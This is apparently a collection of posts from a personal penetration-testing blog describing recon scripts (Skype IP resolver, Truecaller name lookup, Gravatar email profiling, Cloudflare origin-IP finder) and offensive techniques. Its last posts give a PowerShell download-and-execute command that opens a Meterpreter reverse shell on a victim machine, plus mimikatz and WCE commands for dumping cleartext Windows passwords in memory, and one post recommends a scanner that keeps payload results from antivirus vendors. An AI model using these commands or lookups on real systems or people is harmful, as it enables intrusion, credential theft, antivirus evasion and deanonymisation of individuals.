This is simple bash script which query skype username against http://resolveme.org/ and grab I.P.
wget https://raw2.github.com/niravkdesai/skypersolver.sh/master/skypersolver.sh
sh skypersolver.sh
skype resover bash script
Skype resolver bash script
Author Archives: niravdesai1991
Bash script for checking HTTP headers for security
For checking http header for security perspective you can visit Security Headers . It will check for following header.
Access Control Allow Origin
Content Security Policy
Cross Domain Meta Policy
NoSniff
Server Information
Strict Transport Security
UTF-8 Character Encoding
X-Frame-Options
X-Powered-By
X-XSS-Protection
I wrote bash script which check HTTP header of website against securityheaders.com & give output.
git clone https://github.com/niravkdesai/securityheaders.git
chmod +x header.sh
./header.sh
HTTP-Header
Bash script for checking an account that has been compromised in a data breach.
Troyhunt start great website for checking your email address has been compromised in data breach or not.Right now Adobe,Stratfor,Gawker,Pixel Federation,Yahoo!,Sony,Vodafone `s breach email address is listed. You can check it manually on their site.
I wrote simple bash script for checking against their site that email address has been compromised or not.You can also write in python using simple requests module.
python-havebeenpwned
have-i-been-pwned bash script
Usage:-
git clone https://github.com/niravkdesai/haveibeenpwned.git
cd haveibeenpwned
chmod +x haveibeenpwned.sh
./haveibeenpwned.sh
Please enter email address to check against http://haveibeenpwned.com
troyhunt%40hotmail.com
You have been pwned in [“Adobe”] breach
Python script for auditing robots.txt
Before one year i wrote different methods to exploit robots.txt file; you can find it here. Sometimes, due to weak directory permission you can get into dis-allowed directory from robots.txt.This python script check the HTTP status code of each Disallow entry in order to check automatically if these directories are available or not.For Original article click here.
It require python3 and urlib3 module.
git clone https://github.com/behindthefirewalls/Parsero.git
cd Parsero
python3 parsero.py -h
python3 parsero.py -u localhost/mutillidae
Auditing Robots.txt
Now you can see that which dis-allowed directory is allowed , it means for which we got HTTP-status code 200.
Truecaller Name Retriever python script
Truecaller is a global phone directory application for smartphones and feature phones, and accessible via a Web site. If you have any unknown mobile number you can search in truecaller website or using truecaller application.This python script is written by A’mmer Almadani. Script is still in developing phase.More functions will be added soon.
git clone https://github.com/Logic-gate/callerpy.git
cd callerpy
Now open caller.py file & enter your twitter credential in line 39,40. it will use for authentication.
python caller.py -h
usage: callerpy.py [-h] -n number [-c country] [-cc country code] -l login
TrueCaller Name Retriever
optional arguments:
-h, –help show this help message and exit
-n number, –number number
Phone Number Without Country Code (default: None)
-c country, –country country
Country | String (default: None)
-cc country code, –countrycode country code
Country | Int (default: None)
-l login, –login login
Login Method | twitter, g+, fb (default: twitter)
python callerpy.py -n 9016986989 -c india-other -l twitter
Truecaller Name Retriever Python Script
Python script to search email addresses against the Gravatar database.
Gravatar is a service for providing globally unique avatars.When the user posts a comment on such a blog that requires an e-mail address, the blogging software checks whether that e-mail address has an associated avatar at Gravatar. If so, the Gravatar is shown along with the comment.Script is made by averagesecurityguy . Our script take email address & check against gravatar database , if email address is exist , then extract username , location, account detail.First we will understand how it`s work , for developer resources click here.
To view details of email address ; we need to create email hash of address. For example , if you want to check email address nirav.desai1991@gmail.com. We have to create md5 hash of email address.
root@bt:~#echo -n nirav.desai1991@gmail.com| md5sum
dfd36ad92895ea6b7829d2918ad07fcf
To extract details about email address we have to make following request
http://en.gravatar.com/dfd36ad92895ea6b7829d2918ad07fcf.json
And there we can get details about my gravatar profile.
It`s just simple details how it`s work. Now we will go to script, Gravatar.py takes a file with a list of email address, one on each line, and searches Gravatar for information about the email address. If address is registered with Gravatar, then selected data points are extracted from the Gravatar profile.
wget https://raw.github.com/averagesecurityguy/scripts/master/gravatar.py
Now you need email address list file .
python gravatar.py email
gravatar email address search
Cloudflare Resolver Bash script
CloudFlare is a content delivery network and distributed domain name server service marketed as improving website performance and speed and providing security. Before one year i posted different methods to find out real I.P. behind cloudflare.
All those methods are only working , if there is admin misconfiguration.
(1)DNS bruteforce
(2)NMAP
(3)Netcraft toolbar
I made simple bash script which do all things for you, you just have to provide name of website which is behind cloudflare.
git clone https://github.com/niravkdesai/cloudflare-ip.git
cd cloudflare-ip
chmod +x cloudflare-ip.sh
./cloudflare-ip.sh
In script you have to change I.P. in line 45 . i used dns variable , because for unknown DNS my isp redirect to its address ,so we can know that response is valid or not.Change that I.P. according to your setting.
cloudflare-resolver
Bytescanner API
As a penetration tester , sometimes we have to test our payload against different AV , so we can know that during actual test it can not detected by AV. Most of people are using virus total , but as we know virus total distribute their result with AV companies , so after sometimes our payload is detected by more AV.
Bytescanner is same as virus total , but they don`t share their result with AV companies. They also provide python,c,Delphi,API,java,c#,php API.
(1)Signup at Bytescanner
(2)Confirm your email address.
(3)Download API from SDK menu. i `m going to use python API, you can use other API.
(5)Now open python file & at line number 12 &13 replace youremailaddress@bytescanner.com and yourbytescannerpassword with your email address & password respectively.
(6)Compile it and make it executable.
chmod +x bsPython.py
python bsPython.py
(7)Now enter path of file to scan.
Byte scanner python api
Get shell using powersploit
If you get physical access of machine for very small time & you want to get shell then you can use invoke-shellcode powersploit function. Powershell must be installed in victim machine to use this utility. For more details you can visit this link . I just want to give demo how to get shell using powersploit.
First in metasploit start listener . Invoke-shellcode function support windows/meterpreter/reverse_http & windows/meterpreter/reverse_https ; so in listener set any of those payload.
Now on victim machine open powershell prompt ; & put following code in powershell prompt
IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’); Invoke-Shellcode –Payload windows/meterpreter/reverse_http –Lhost 192.168.56.101 –Lport 443 –Force
Note: Change Lhost , payload & lport according to your listener.
Powershell-exploit
And bingo you will get shell.
Different Methods to Get Clear Text windows Passwords.
Get clear text password:-
Following are different methods to get clear text password of windows from metasploit.
(1)using mimikatz or wce get clear text password of victim.
(2) You can also use mimikatz password dump method .
(3)You can also use mimikatz meterpreter plugin.
meterpreter > load mimikatz
meterpreter > help mimikatz
meterpreter > kerberos
meterpreter > mimikatz_command -h
meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a “full”
(4)You can use wce & mimikatz in memory without uploading binary.
(a)WCE in memory:-
cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a “-o foo.txt”
cat foo.txt
(b)Mimikatz in memory:-
cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a ‘”sekurlsa::logonPasswords full” exit’
Penetration Tester `s Script 